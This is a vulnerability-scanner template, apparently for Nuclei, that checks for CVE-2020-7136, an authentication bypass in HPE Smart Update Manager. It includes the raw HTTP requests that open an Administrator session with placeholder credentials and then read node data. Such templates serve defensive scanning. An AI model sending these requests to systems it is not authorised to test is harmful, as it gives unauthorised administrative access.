61 lines
2.5 KiB
YAML
61 lines
2.5 KiB
YAML
id: CVE-2020-7136
|
|
|
|
info:
|
|
name: HPE Smart Update Manager < 8.5.6 - Remote Unauthorized Access
|
|
author: gy741
|
|
severity: critical
|
|
description: HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access.
|
|
impact: |
|
|
An attacker can gain unauthorized access to the HPE Smart Update Manager, potentially leading to further compromise of the system.
|
|
remediation: Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP).
|
|
reference:
|
|
- https://www.tenable.com/security/research/tra-2020-02
|
|
- https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=emr_na-hpesbmu03997en_us
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-7136
|
|
- https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbmu03997en_us
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2020-7136
|
|
cwe-id: CWE-288
|
|
epss-score: 0.26929
|
|
epss-percentile: 0.96662
|
|
cpe: cpe:2.3:a:hpe:smart_update_manager:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 2
|
|
vendor: hpe
|
|
product: smart_update_manager
|
|
tags: cve,cve2020,hp,auth-bypass,hpe,tenable
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /session/create HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: */*
|
|
Content-Type: application/json
|
|
|
|
{"hapi":{"username":"Administrator","password":"any_password","language":"en","mode":"gui", "usesshkey":true, "privatekey":"any_privateky", "passphrase":"any_passphase","settings":{"output_filter":"passed","port_number":"444"}}}
|
|
- |
|
|
GET /session/{{sessionid}}/node/index HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "hmessage"
|
|
- "Command completed successfully."
|
|
- "node_name"
|
|
condition: and
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: sessionid
|
|
group: 1
|
|
regex:
|
|
- '"sessionId":"([a-z0-9.]+)"'
|
|
internal: true
|
|
part: body
|
|
# digest: 4a0a004730450221009f65af7463005817eaf2c8b1d20ecc91865dc0bc33b2e3eb7d8ee11b885a7a7a02207baf70efdf4cb2b174edd1bb6a8c71233fb6f7d3c54f74aa1b93db5446ddb5a2:922c64590222798bb761d5b6d8e72950 |